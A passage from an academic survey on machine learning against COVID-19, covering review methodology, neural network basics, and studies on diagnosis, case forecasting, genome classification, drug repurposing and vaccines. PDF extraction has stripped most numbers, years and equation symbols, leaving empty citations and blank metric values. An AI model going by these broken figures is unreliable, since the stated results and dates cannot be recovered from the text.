continents of asia was reported on january , , without any connection to the epidemiology at the market place in wuhan (hui et al., ). subsequently, the spread continued, and various cases from countries abroad, such as the usa, italy, and france began to be reported (holshue et al., ). human-to-human transmission usually occurs in the case of close contact between humans. restricting human-to-human spread is crucial for decreasing secondary infections among healthcare workers and close contact. the who recommended chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ infection control interventions to reduce the risk of the general spread of acute respiratory diseases such as avoiding close contact with infected patients, frequent washing of hands in case of contact with ill people, and avoiding unprotected contacts with wild or farm animals. people suffering from the acute respiratory infection should always observe cough etiquette by maintaining distancing, covering their cough, sneezing with disposable tissues, and washing their hands frequently. within the healthcare system, equipment improved standard infection control and prevention practices are recommended, especially in the hospital emergency unit (world health organization, ). progressively, an interim clinical guideline has been established by the us center for disease control and prevention for the covid- pandemic to place control measures and reduce the spread of sars-cov- in the usa (patel & jernigan, ). in minimizing the devastating effect of the covid- pandemic and fighting the virus, the timely processing of covid- data analytics is highly critical. the data can come from different aspects such as the patients, fractionated into molecular, society, and population, which can help in the prevention and treatment of covid- (park et al., ). machine learning is one of the major technologies in combatting covid- (elavarasan & pugazhendhi, ; kumar, gupta & srivastava, ). much effort based on synergy from the machine learning and biomedical research community is ongoing to develop different approaches to combat the disease. ongoing efforts include the screening of patients, detection and monitoring of patients, development of drugs, repurposing of drugs to treat patients with covid- , predicting the protein structure related to covid- , covid- diagnostic systems, covid- vaccine development, and analyzing personalized therapeutic effects for the evaluation of new patients (alimadadi et al., ). the overall goal of these disease control techniques is to prevent the spread; track confirmed cases, recoveries, and mortality; and predict future pandemics (vaishya et al., ). many studies adopted machine learning to fight the covid- pandemic from a different perspective. a systematic literature review of published and preprinted reports on prediction models for diagnosing covid- was reported. prediction models were found floating the academic literature very rapidly to help in diagnosing covid- and making critical medical decisions (wynants et al., ). however, the major issue with the work is that it uses preprint publication that has not been validated by peer review. the review is not specific to machine learning for covid- . sources of covid- datasets that can guide researchers access different data for studies on covid- are absent. the study is limited to the diagnosis and prognosis of covid- . a comprehensive taxonomy on the prediction tools to show the area that needs improvement is missing in the survey. bibliometric analysis is not integrated into the study. similar bibliometric analyses have been reported in the literature as presented by chahrour et al. ( ), hossain ( ), and lou et al. ( ). however, these existing analyses differ from the current bibliometric analysis in this study because the current analysis result focuses on the application of machine learning techniques to combat covid- pandemic as opposed to various literature reporting general medical practices on covid- . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in this study, we propose to conduct a dedicated comprehensive survey on the adoption of machine learning to fight the covid- pandemic from a different perspective, including an extensive literature review and a bibliometric analysis. to the best of our knowledge, this study is the first comprehensive analysis of research output focusing on several possible applications of machine learning techniques for mitigating the worldwide spread of the ongoing covid- pandemic. we are mindful that other publications might not be captured in our scope because the current study is only limited to the eight academic databases mentioned in table . we are also very dependent on the indexing of the databases used, which is akin to any other bibliometric research study. other sections of the study are organized as follows: “methodology” presents the methodology for the survey. “theoretical background of machine learning algorithms” presents the rudiments of the major machine learning algorithms used in fighting the covid- pandemic. “covid- machine learning adoption-oriented perspective” presents the adoption of machine learning to fight covid- . “covid- datasets” unravels the different sources of covid- datasets. “survey and bibliometric analysis” discusses the survey and bibliometric analysis. “challenges and future research opportunities” unveils challenges and future research directions before the conclusion in “conclusions”. figure presents the visual structure of the survey article, which is similar to the work in (mohammadi et al., ). methodology this section presents the protocol followed to survey the adoption of machine learning in fighting covid- . the survey was performed based on a systematic literature review procedure in computer science given by weidt & silva ( ). the search keywords, techniques, data sources, databases, and inclusion/exclusion criteria used are discussed. search keywords initial search keywords were carefully selected based on the defined research goal. after an initial search, multiple keywords were formulated from new words found in several relevant articles. the keywords were later reduced to suit the objective of the research. the keywords used for the study included “deep learning, covid- ,” “convolutional neural network, covid- ,” “long short term memory, covid- ,” “artificial neural network, covid- ,” “machine learning, covid- ,” “decision tree, covid- ,” “covid- diagnosis tool,” and “covid- decision support system.” data sources the defined search keywords were used to retrieve relevant journal articles and conference papers published by prominent peer-reviewed journals indexed in various academic databases. table shows the different academic databases used to obtain articles for the survey. chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ article inclusion/exclusion criteria inclusion/exclusion criteria were set up based on the research aim to decide which articles are eligible for the next review stage. articles that meet the inclusion criteria were considered relevant for the research, and those that do not meet the inclusion criteria were excluded. the set inclusion/exclusion criteria are provided in table . article selection article selection for this research followed a three-stage analysis. the first analysis stage considered only the titles and abstracts of the articles to extract relevant articles. table academic databases. academic database link dblp http://dblp.uni-trier.de/ acm digital library http://dl.acm.org/ ieeexplore https://ieeexplore.ieee.org/ sciencedirect http://www.sciencedirect.com/ springerlink https://link.springer.com/ pubmed https://pubmed.ncbi.nlm.nih.gov/ scopus https://www.scopus.com/ web of science https://apps.webofknowledge.com/ figure graphical representation of the survey structure. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dblp.uni-trier.de/ http://dl.acm.org/ https://ieeexplore.ieee.org/ http://www.sciencedirect.com/ https://link.springer.com/ https://pubmed.ncbi.nlm.nih.gov/ https://www.scopus.com/ https://apps.webofknowledge.com/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the second analysis stage considered the analysis of the abstract, introduction, and conclusion to refine the selection in the first stage. at the third and final analysis stages, articles were read thoroughly, and a threshold was set to rate the quality of articles in terms of their relevance to the research. a article was selected if it reported an empirical application of machine learning to fight covid- similar to rodriguez-morales et al. ( ). articles that met the threshold value were selected, and those below the threshold were dropped. figure shows the total number of articles obtained from the academic databases and the final number of articles considered for the research after applying all the extraction criteria. bibliometric protocol vosviewer software was used to present a bibliometric analysis of the existing literature on covid- . vosviewer software is a tool for constructing and visualizing bibliometric maps of items, such as journals, research, or individual publications. these maps can be created based on citation, bibliographic coupling, co-citation, or co-authorship relations. the bibliometric analysis software also offers text mining functionality that can table article inclusion/exclusion criteria. inclusion criteria exclusion criteria the review only focuses on covid- other viral infections and health issues were not considered relevant in the survey only articles that applied machine learning techniques to fight covid- were considered articles using techniques other than machine learning techniques were excluded articles/conference papers published by prominent and indexed journals were included articles/conference papers published by non-indexed journals were excluded. the article uploaded as a preprint in preprint servers such as biorxiv, medrxiv, arxiv, etc. without peer review were excluded only articles written in the english language were considered for inclusion articles written in languages other than english were excluded figure article selection process. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ be used to construct and visualize co-occurrence networks of important terms extracted from a body of scientific literature (see www.vosviewer.com). we only used , publications with the keyword “novel coronavirus” and publications with the keyword “covid- and artificial intelligence” that were retrieved from scopus and web of science academic databases for the bibliometric analysis presented in this study. only document results were extracted using the keyword “covid- and machine learning” from the same academic database. articles from other sources were not considered because most of these publications have not been peer-reviewed and are not available online in the form of preprint publications. theoretical background of machine learning algorithms numerous machine learning algorithms exist in the literature. in this section, we discuss the basic operations of the major machine learning algorithms used in fighting the covid- pandemic to provide the readers with a basic concept of how the algorithms operate in achieving their goal, especially novice researchers, thus making the study self-contained. the main algorithms include artificial neural network (ann), convolutional neural network (cnn), and long short term memory (lstm). artificial neural network artificial neural network is a machine learning algorithm designed to emulate the human brain. similar to neurons in the human brain, ann consists of interconnected nodes. a given ann consists of three essential components, namely, node (neuron) character, network topology, and several learning rules (livingstone, ). signal processing strategy involving the number of inputs and outputs associated with a node, the weight of each input and output, and the activation function are all determined by the node character. the organization of the nodes and the interconnection between them are determined by the network architecture, which usually consists of three underlying layers (input, output, and hidden layers). learning is employed to train the network. the learning rules decide on weight initialization and adjustment. an ann is said to have learnt if it can process probabilistic, fuzzy, noisy, and vague data with an insignificant negative effect on the output quality, and generalize acquired knowledge to unknown tasks (basheer & hajmeer, ). a basic ann model consists of multiple nodes such that every node receives multiple inputs from other nodes through connections having associated weights. the weighted sum of the inputs is passed through a threshold gate. the node is activated and transmits the output to another node only if the weighted sum of its input exceeds the threshold (basheer & hajmeer, ). convolutional neural network convolutional neural network is the most commonly used deep learning algorithm (haque & neubert, ). it is a discriminative deep learning algorithm formed by a stack of multiple convolutional and pooling layers (deng, ). the major strength of cnn lies chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.vosviewer.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in its ability to perform parameter sharing, sparse interaction, and equal representation. the network is faster and easier to train due to its utilization of local connections and sharing of weights (pouyanfar et al., ). a typical cnn receives an image as its input and has neurons arranged in a d form connecting to only a portion of the previous layer (haque & neubert, ). the architecture of cnn is presented in series of stages, where the first stages consist of convolution and pooling layers, and the final stage is composed of a fully connected layer (lecun, bengio & hinton, ). convolutional neural network receives d input x in the form m � m � r, where m is the height and width of the input, and r is the channel number, for example, in rgb r ¼ . the convolution layer has several filters known as kernels k with a size of n � n � q where n < x and q � r. the kernels share the same parameters of weight (wk) and bias (bk). during convolution, k feature maps are generated (hkh), each having size m � n � . the convolution layer finds the dot product between w and input x, and applies activation function f to the output expressed as (pouyanfar et al., ): hk ¼ f wk � x þ bk � � . the pooling layer prevents overfitting and hastens training by reducing the length of the feature map (pouyanfar et al., ; zhao et al., ). maximum and average pooling are the widely applied pooling methods. finally, the fully connected softmax layers are deployed for prediction (zhao et al., ). long short term memory the lstm deep learning network is a type of recurrent neural network that can recall data features over several intervals of time (liu et al., ). it was developed to solve the vanishing gradient weakness of the recurrent neural network (karim et al., ). the hidden layers of lstm are treated as memory cells, making the network powerful in handling long- and short-term correlation in a time series (zhao et al., ). the earliest version of lstm contained memory cells, and input and output gates with no forget gate; the forget gate was later deployed to enable continual learning of tasks by resetting the state of the lstm (greff et al., ). its updated architecture consists of multiple lstm units with each unit having an input gate, a forget gate, an output gate, and a memory cell. sak, senior & beaufays ( ) described the underlying architecture of lstm as consisting of memory blocks in its hidden layer. the memory blocks have memory cells for the storage of the temporal state of the network with additional units, known as gates, to supervise the information flow. a memory cell has an input gate that manages the inflow of input activations to the memory cell and an output gate to manage the outflow of cell activations to the network. the forget gate is incorporated to forget or reset the memory of the cell adaptively. lstm computes mapping iteratively at a timestamp t ¼ to t with an input sequence x ¼ x ; x ; . . . ; xr � � and an output sequence y ¼ ðy ; y ; . . . ; yrÞ. lstm is good at addressing complex sequential machine learning problems (karim et al., ). deep lstm architectures consist of stacked lstm layers (sak, senior & beaufays, ). lstms are strong in handling temporal dependencies in sequences but weak in dealing with long sequence dependencies (karim et al., ). chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ covid- machine learning adoption-oriented perspective in the fight against covid- , different aspects of artificial intelligence (ai) were applied to curtail its adverse effect (dananjayan & raj, ). the taxonomy in fig. was created from the project that involved machine learning in fighting covid- . the data used in creating the taxonomy were extracted from the articles that applied the machine learning algorithm to fight covid- . covid- diagnostic tools currently, the sensitivities for reverse transcription-polymerase chain reaction (rt–pcr)- based viral nucleic acid assay are used as the reference standard method to confirm covid- infection (corman et al., ). however, such a laboratory test is time consuming, and the supply of test kits may be the bottleneck for a rapidly growing suspicious population even for many developed countries such as the usa. more importantly, initial false-negative or weakly positive rt–pcr test results were found in figure taxonomy of the machine learning algorithms adopted in fighting covid- . full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ several later-confirmed cases, while highly suspicious computed tomography (ct) imaging features were present (xu et al., ; xie et al., ). the treatment and screening of covid- can be more effective when deep learning approach, ct features, and real-time rt–pcr results are integrated (li et al., a). ai and deep learning can assist in developing diagnostic tools and deciding on treatment (rao & vazquez, ; shi et al., ). as a result, many diagnostic tools were developed based on the machine learning algorithm to fight covid- . for example, apostolopoulos & mpesiana ( ) applied transfer learning with cnn to detect covid- from x-ray images containing common bacterial pneumonia and normal incidents and established covid- infection. transfer learning cnn was used to diagnose covid- cases from x-ray datasets. the results indicated that vgg diagnosed covid- confirmed cases with better accuracy on two- and three-classification problems compared with mobilenet v , inception, xception, and inception resnet v . the proposed approach can help develop a cost-effective, fast, and automatic covid- diagnostic tool, and reduce the exposure of medical workers to covid- . similarly, rahaman et al. ( ) developed an automated computer-aided diagnosis (cad) system for the detection of covid- samples from healthy cases and cases with pneumonia using chest x-ray (cxr) images. their study demonstrated the effectiveness of applying deep transfer learning techniques for the identification of covid- cases using cxr images. ardakani et al. ( ) were motivated by the time consumption and high cost of the traditional medical laboratory covid- test to investigate the performance of well-known cnns in diagnosing covid- . the variants of cnn included vgg- , alexnet, xception, vgg- , resnet- , squeezenet, resnet- , googlenet, mobilenet-v , and resnet- . all the cnn variants were applied on ct scan images because the ct slice is a fast method of diagnosing patients with covid- . the diagnostic results of the cnn variants indicated that resnet- and xception outperformed the other cnn variants in diagnosing covid- . they concluded that resnet- has a high sensitivity in characterizing and diagnosing covid- infections. therefore, it can be used as an alternative tool in the department of radiology for diagnosing covid- infection. it is cheaper and faster compared with traditional laboratory analysis. butt et al. ( ) applied cnn for the detection of covid- from the chest ct scan of patients. cnn was found very fast and reliable in the detection of covid- from a chest ct scan compared with the conventional rt–pcr testing. in summary, the cnn model is fast and reliable in detecting covid- infection. huang et al. ( b) applied a deep learning algorithm on a chest ct scan of a patient with covid- to quantify lung burden changes. the patients with covid- were grouped into mild, moderate, severe, and critical based on findings from the chest ct scan, clinical evaluation, and laboratory results. deep learning algorithm was applied to assess the lung burden changes. they found that the assessment of lung opacification measured on the chest ct scan substantially differed from that of the clinical groups. the approach can remove the subjectivity in the initial assessment of covid- findings. chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mei et al. ( ) proposed a joint model comprising cnn, support vector machine (svm), random forest (rf), and multilayer perceptron integrated with chest ct scan result and non-image clinical information to predict covid- infection in a patient. cnn was run on the ct image, while the other algorithms classified covid- using the non-image clinical information. the output of the cnn and the different algorithms were combined to predict the patient’s covid- infection. the diagnostic tool can rapidly detect covid- infection in patients. liu et al. ( a) used logistic regression for the prediction of covid- infection sliding to the severity of the covid- cohort. the results of the study showed that the ct quantification for the pneumonia lesions could predict the progression of a patient with covid- to a severe stage at an early, non-invasive level. this situation can provide a prognostic indicator for coronavirus clinical management. jiang et al. ( ) applied a machine learning algorithm to predict covid- clinical severity. they developed a predictive tool that predicts patients at risk for increased covid- severity at the first presentation. the survey can help in the optimal utilization of scarce resources to cope with the covid- pandemic. hurt, kligerman & hsiao ( ) collected cxr images from patients with covid- in china and america. they applied a deep learning algorithm for the early diagnosis of covid- from the cxr. they found that deep learning predicted and consistently localized areas of pneumonia. the deep learning algorithm can diagnose a patient’s covid- infection early. loey, smarandache & khalifa ( ) were motivated by the insufficient covid- dataset to propose a generative adversarial network (gan) and cnn variant to detect covid- in patients. gan was used to generate more x-ray images. googlenet, alexnet, and resnet were applied as the deep transfer learning models. they found that googlenet and alexnet scored . %, . %, and %, respectively, in the four-, three-, and two-class classification problem, respectively. the study’s method can facilitate the early detection of covid- and reduce the workload of a radiologist. wu et al. ( ) proposed a multi-view resnet for the screening of covid- from chest ct scan images. resnet was trained with the multi-view chest ct scan images. the results showed that the multi-view resnet fusion achieved a high performance compared with the single view. the diagnosis tool developed can reduce the workload of a radiologist by offering fast, accurate covid- diagnosis. ucar & korkmaz ( ) developed a rapid covid- diagnosis tool from x-ray images based on sqeezenet (a pre-defined cnn) and the bayesian optimization method. the squeezenet hyperparameters were optimized using the bayesian optimization method. bayesian optimization-based squeezenet was applied to detect covid- from x-ray images labeled normal, pneumonia, and covid- . bayesian-based squeezenet outperformed the baseline diagnostic tools. toğaçar, ergen & cömert ( ) applied cnn for the exploitation of social mimic and cxr based on fuzzy color and the stacking method to diagnose covid- . the stacked data were trained using cnn, and the features obtained were processed with mimicking social optimization. the compelling features were used for classification into covid- , pneumonia, and standard x-ray imagery using svm. singh et al. ( ) used cnn and multi-objective differential evolution (mode) for the early detection of chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ covid- from a chest ct scan image. the initial parameters of the cnn were tuned using mode to create a mode-based cnn and classify patients with covid- based on positive or negative chest ct scan images. mode-based cnn outperformed the competitive models (ann, anfis, and traditional cnn). the proposed method is beneficial for covid- real-time classification owing to its speed in diagnosing covid- . salman et al. ( ) constructed a cnn-based covid- diagnostic tool for the detection of covid- from cxr images. cnn–inceptionv was applied to detect covid- from x-ray images of patients infected with covid- and normal x-ray images. the results indicated that cnn–inceptionv could detect covid- from the x-ray images and reduce the testing time required by a radiologist. ozturk et al. ( ) used cnn to develop an automated tool for diagnosing covid- from raw cxr images. binary and multi-class categories were experimented on using a cnn with convolution layers with a different filter on each convolution layer. the model can be used for the early screening of patients with covid- and assist the radiologist in validating covid- screening. li et al. ( b) developed an automated framework based on cnn for the detection of covid- from chest ct scan and differentiate it from community-acquired pneumonia. the study collected data from , patients comprising , chest ct scans. cnn was applied to detect patients with covid- and typical community pneumonia. the experiment results showed that cnn can distinguish patients with covid- from those with community-acquired pneumonia and other similar lung diseases. the proposed framework automated the covid- testing and reduced the testing time and fatigue. yang et al. ( a) applied densely connected convolutional networks optimized with stochastic gradient descent algorithm for the detection of covid- from chest ct scan images. oh, park & ye ( ) applied patch-based cnn–resnet- (p-cnn) due to lack of sufficient training data for diagnosing covid- from cxr images. the study used imaging biomarkers of the cxr radiographs. p-cnn resnet- was applied, and p-cnn produced clinically salient maps that are useful in diagnosing covid- and patient triage. p-cnn resnet- achieved the best result compared with the baselined algorithm performance. the limited amount of data can be used for covid- diagnoses and were interpretable. table summarizes the diagnostic tools developed based on machine learning. refer to dong et al. ( ) for an engaging research review on the role of imaging in the detection and management of covid- disease spread. covid- decision support system the decision support system related to covid- can help decision/policymakers formulate policy to curtail covid- . many covid- decision support systems were developed based on machine learning approaches. for example, ayyoubzadeh et al. ( ) applied lstm and linear regression to predict the number of positive cases in iran. lstm and linear regression were used on google search data to predict the covid- cases in iran. the results indicated that linear regression outperforms lstm in predicting the positive cases of covid- . the algorithm can predict the trend of the covid- pandemic in iran, which can help policymakers plan the allocation of medical resources. chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chimmula & zhang ( ) applied deep lstm for forecasting covid- transmission and possible covid- ending period in canada and other parts of the world. the transmission rate of canada was compared with that of italy and the usa. the future outbreak of the covid- pandemic was predicted to help canadian decision makers monitor the covid- situation and prevent the future transmission of the epidemic in canada. liu et al. ( b) proposed ann in modeling the trend of covid- and restoring the operational capability of medical services in china. ann was used for modeling the pattern of covid- in wuhan, beijing, shanghai, and guangzhou. autoregressive integrated moving average (arima) was applied for the estimation of nonlocal hospital demands for the period of covid- pandemic in beijing, shanghai, and guangzhou. the results indicated that the number of people infected with covid- would increase by %, while death would increase by %. covid- will reach its peak by march and toward the end of april . this finding will assist policymakers and health officials in planning to deal with challenges of the unmet medical requirement of other diseases during the covid- pandemic. pirouz et al. ( ) proposed a group method of data handling in a neural network to predict the number of covid- confirmed cases based on weather conditions. the dominant weather condition used included temperature, city density, humidity, and wind speed. the results indicated that humidity and temperature have a substantial influence on covid- confirmed cases. temperature and humidity influence covid- negatively and positively, respectively. these results can be used by decision makers to manage the covid- pandemic. yang et al. ( b) applied lstm to predict the covid- trend in china. the prediction model indicated that the covid- pandemic should peak toward the end of february and start declining at the end of april . the prediction model can be used by authorities in china to decide in controlling the covid- pandemic. vaid, cakan & bhandari ( ) adopted a machine learning approach to predict covid- potential infections based on reported cases in north america. critical parameters were identified from dimension reduction. passed diseases were inferred from recent fatalities using a hierarchical bayesian estimator. the model predicted potential covid- infections in north america. policymakers in north america can use the projection to curtail the effect of the covid- pandemic. tuli et al. ( ) developed a machine learning covid- predictive model and deployed it in the cloud computing environment for real-time tracking of covid- , predicting the growth and potential thread of covid- in different countries worldwide. government and citizens can use the results for proactive measures to fight covid- . tiwari, kumar & guleria ( ) used a machine learning approach to predict the covid- pandemic number of cases, recoveries, and deaths in india based on data from china. the prediction results indicated that covid- would peak between the third and fourth week of april . the indian government can use the study to formulate policies and decide on mitigating the spread of covid- . ribeiro et al. ( ) evaluated six machine learning algorithms, namely, cubis regression (cubist), rf, ridge regression (ridge), support vector regression (svr), arima, and stacking-ensemble chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table the summary of the covid- diagnostic tools based on machine learning algorithms. reference algorithm performance contribution benefit apostolopoulos & mpesiana ( ) transfer learning with cnn accuracy: . % device approach for automatic diagnostic of covid- based on x-ray cost-effective, fast diagnosis and reduce exposure of medical workers to covid- sensitivity: . % specificity: . % ardakani et al. ( ) variants of cnn resnet accuracy: . % automated characterization and diagnosis of covid- infection. cheaper and faster compared to the traditional laboratory analysis of covid- . reduces medical worker’s workload. sensitivity: % specificity: . % butt et al. ( ) cnn auc: . outperform the traditional rt-pcr testing of covid- fast and reliable in detecting covid- pandemic.sensitivity: . % specificity: . %. huang et al. ( b) deep learning algorithm not applicable as a result of anova analysis the assessment of the lung opacification measured is significantly different from the clinical groups the approach has the potential to remove the subjectivity in the initial evaluation of covid- findings as well as follow up pulmonary li et al. ( b) cnn sensitivity: % the automated framework that differentiates covid- from pneumonia automated the covid- testing process, reduces the testing time and fatigue. specificity: % auc: % liu et al. ( a) p-cnn sensitivity: % diagnose covid- with limited data and present new probabilistic grad- cam salient map limited amount of data can be used for the covid- diagnoses, and it is interpretable. precision: . % ozturk et al. ( ) cnn sensitivity: . % improve efficiency and automate the covid- screening process automate the process of covid- diagnoses to reduce fatiguespecificity: . % accuracy: . % salman et al. ( ) cnn sensitivity: % automated covid- screening process reduces diagnostic time specificity: % accuracy: % singh et al. ( ) mode based cnn sensitivity: > % diagnose covid- with better accuracy than the competitive models the proposal is beneficial to covid- real-time classificationspecificity: > % toğaçar, ergen & cömert ( ) cnn-svm overall accuracy: . % contributed to the efficient detection of covid- automated detection of covid- patient ucar & korkmaz ( ) bayesian-based squeezenet accuracy: % presents alternative rapid covid- diagnostic tool based on deep bayes- squeezenet it will be of benefit to healthcare professionals in diagnosing covid- efficiently. specificity: . % wu et al. ( ) resnet accuracy: . provide covid- diagnosis from multiple view reduce the workload of a radiologist by offering fast and accurate covid- diagnosis sensitivity: . specificity: . loey, smarandache & khalifa ( ) googlenet, alexnet and restnet googlenet, alexnet and googlenet scored . %, . % and % in the , and classes classification problems generate sufficient covid- data to improve covid- diagnosis early detection of covid- and reduce the workload of radiologist chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learning (sel), on covid- datasets collected in brazil to predict confirmed cases for , , and days ahead. they found that svr outperformed ridge, arima, rf, cubist, and sel. the study can help monitor covid- cases in brazil and facilitate critical decisions on covid- . tummers et al. ( ) applied k-means to cluster documents based on covid- and people with intellectual disability. table summarizes the studies on covid- decision support system. covid- from genome sequences the protein sequence of covid- can be collected to apply the machine learning approach for the prediction of covid- (qiang et al., ). for example, qiang et al. ( ) predicted the infection risk of non-human origin of covid- from spike protein for prompt alarm using rf. the genome data comprised of non-human covid- origin (positive) and human covid- origin (negative). rf was applied for the training to predict non-human covid- origin. the results showed that the rf model achieved high accuracy in predicting non-human covid- origin. the study can be used in covid- genome mutation surveillance and exploring evolutionary dynamics in a simple, fast, and large-scale manner. randhawa et al. ( ) combined decision tree and digital signal processing (dt–dsp) to detect the covid- virus genome and identified the signature of intrinsic covid- viruses’ genome. dt–dsp was applied to explore over , viral genome sequences with . million by the viral sequences of covid- . the result obtained supported the bat origin of covid- and successfully classified covid- with % accuracy as sub-genus sarbecovirus within betacoronavirus. dt–dsp is a reliable real-time alternative taxonomic classification. table summarizes the studies. table (continued) reference algorithm performance contribution benefit hurt, kligerman & hsiao ( ) deep learning not provided improve the detection covid- from x-ray early detection of covid- jiang et al. ( ) machine learning algorithm accuracy: – % detect covid- severity in a patient at the initial presentation help in optimal utilization of scarce resources to cope with covid- liu et al. ( a) logistic regression roc: . applied ct quantification of pneumonia to predict progression to covid- severity provide a prognostic indicator for covid- clinical managementconfidence interval: % mei et al. ( ) deep ensemble algorithm roc: . predict covid- with both image and none image clinical information the ensemble diagnostic tool can detect covid- patients rapidlyaccuracy: % sensitivity: . % specificity: . % yang et al. ( a) densely connected convolutional networks accuracy: % detect covid- from ct scan via densely connected convolutional networks reduce radiologist workload sensitivity: % specificity: % chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ covid- drug discovery machine learning and ai provide approaches for the speedy processing of a large amount of collected medical data generated daily as well as the extraction of new information from transversely different applications. in the prediction of disease, a viral mutation can be forecast before the emergence of new strains. it also allows the prediction of new structure and availability of broader structural information. efficient drug repurposing can be achieved in mining existing data. the stages for the development of covid- drugs are as follows (park et al., ): disease prediction: the prediction of future-generation viral table the summary of detecting covid- from genome sequence via an algorithm. reference algorithm performance contribution benefit qiang et al. ( ) random forest accuracy: . % able to detect none human covid- origin from spike protein used in covid- genome mutation surveillancemathew correlation coefficient: . randhawa et al. ( ) decision tree accuracy: % successfully used intrinsic viral genomic signatures to classify covid- with % accuracy the dt-dsp is a reliable real-time alternative for the classification of taxonomic table summary of the adoption of machine learning approaches in building covid- decision support systems. reference algorithm performance contribution benefit ayyoubzadeh et al. ( ) lstm & linear regression lstm: rmse . predict covid- positive cases in iran the algorithm can predict the trend of the covid- pandemic in iran, which can help policymakers to plan for the allocation of medical resources linear regression: rmse . chimmula & zhang ( ) lstm rmse: . forecast covid- transmission in canada help decision-makers in monitoring and curtailing future transmission of covid- in canada accuracy: . % liu et al. ( b) ann not applicable estimated the trend of covid- in china help policymakers and health officials attend to the need of other diseases during the covid- pandemic ribeiro et al. ( ) support vector regression mae: . provide future covid- confirmed cases in brazil monitoring covid- cases in brazil and help decision-makers in taken critical decision about covid- tiwari, kumar & guleria ( ) machine learning algorithm (not specified) mae & rsme— graphical the predicted peak period of covid- in india help india policymakers decide on covid- to mitigate its spread tuli et al. ( ) machine learning algorithm (not specified) mse: . e+ provide real life covid- predictions government and citizens can use the results for proactive measures to fight covid- vaid, cakan & bhandari ( ) machine learning algorithm (not specified) not reported predict potential covid- infections policymakers in north america can use the projection to curtail the effect of covid- pandemic yang et al. ( b) lstm confidence interval: % predict covid- trend in china authorities in china to decide to control the covid- pandemic pirouz et al. ( ) group method of data handling neural network accuracy: . % predict covid- pandemic based on weather condition help in managing covid- pandemic chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mutation can be accomplished by ai and machine learning approaches. structural analysis: the covid- structure and primary functional site are characterized. drug repurposing: for insight into new disease treatment, existing drug data are mined. new drug development: efficiencies across the entire pharmaceutical life cycle are achieved by rapid processing. ke et al. ( ) applied machine learning to identify drugs already marketed that can treat covid- . they compiled two independent datasets to develop two machine learning models. the first model was built based on drugs that are known to have antiviral activities. the second model was built based on c-like protease inhibitors. the database of market-approved drugs was screened by the machine learning model to predict the drugs with potential antiviral activities. the drugs predicted to have antiviral activities were evaluated against the antiviral activities by a cell-based feline infectious peritonitis virus duplication assay. the assay results were the machine learning model feedbacks for incremental learning of the model. finally, marketed drugs were identified to have potential antiviral activities. old drugs with antiviral activities against feline infectious peritonitis covid- were found. covid- vaccine development typically, the immune system is prepared to elicit antibody or cell-mediated responses against a pathogen by a vaccine that protects the body from infectious diseases. immunogenicity is the vaccine ability to the response. for a long-time, effective immunity, the vaccine has to properly activate innate, adaptive responses (klein, jedlicka & pekosz, ). the following phases should be adopted to develop a covid- vaccine (gonzalez- dias et al., ): dataset preparation: the quality of the data to be used influences the machine learning algorithm. thus, preparing quality data before feeding into the algorithm is sacrosanct. data come in different sizes ranging from small, medium, and large. data quality must be ensured because a quality immune response is needed. the reliability of the data needs to be guaranteed by ensuring that the serological assay is well qualified in case it is not validated based on known parameters (linearity, specificity, lloq, ruggedness, llod, uloq, and reproducibility). vaccines and relevant genes: in vaccinology, the machine learning algorithm is trained to discover the combination of genes and the best vaccines parameters. the data for the training are extracted from omics experiment, which will be used to obtain the required combination. feature selection is performed to find the best representative of the discriminatory gene signatures. then, the new vaccines are predicted. the three main feature selection methods are filter, wrapper, and embedded. machine learning algorithm selection: this task is not a straightforward task because many factors must be considered before selecting the appropriate algorithm for the modeling. the choice of the algorithm depends on the nature of the data, and the options include supervised, unsupervised, and semi-supervised learning. for instance, if the data have no output, then unsupervised learning algorithm, for example, k–the nearest neighbor is the possible candidate algorithm for the modeling but is not guaranteed. many algorithms have to be tested on solving the chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ same problem before the algorithm that produces the best output is selected. model testing: the performance of the model is tested. the data are partitioned into training and testing; the former is used for training the algorithm, and the latter is used for evaluating the performance of the model using several performance parameters, for example, mse, accuracy, and f-measure (gonzalez-dias et al., ). the application of a machine learning algorithm to sift through trillions of compounds of the vaccine adjuvants can shorten the vaccine development time. the machine learning algorithm can be used for screening compounds for a potential adjuvant candidate for the sars-cov- vaccine (ahuja, reddy & marques, ). covid- datasets data sources ahuja, reddy & marques ( ) reported that covid- data are now growing. in this section, we present the sources of covid- data to the machine learning community. given the 